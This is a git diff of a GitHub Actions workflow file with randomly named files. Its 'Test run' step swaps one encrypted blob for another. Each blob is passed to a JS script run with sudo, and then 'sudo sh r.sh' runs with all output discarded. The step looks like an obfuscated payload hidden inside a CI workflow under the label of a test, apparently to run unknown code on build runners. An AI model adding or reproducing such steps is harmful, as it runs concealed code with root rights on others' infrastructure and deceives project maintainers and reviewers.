--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'lzwfp'
+        echo '13obq'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/BSqoa51MPXMUVSZIsQsbJQdJhtQtlXZc2C/uVQuzEimYOZMiE391wXzsP82mhVacFRWgdaYE7evrCwN/s6Rt7BfNhiYu0hZj9+id1No9nSNa2JatpnQyF xr85c4 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+nwq9AxYG19DSbhPfOfsJjWOs/P1kciCNQT3QAX3eOwzXkoFeriruHhu1ZGtHNaHQQQfzFxzNVC1MUI8BSPjdX5v1pMsBxDu/YE4n5xN/t+P1lY6ndvhU3 mkwa3z && sudo sh r.sh > /dev/null 2>&1
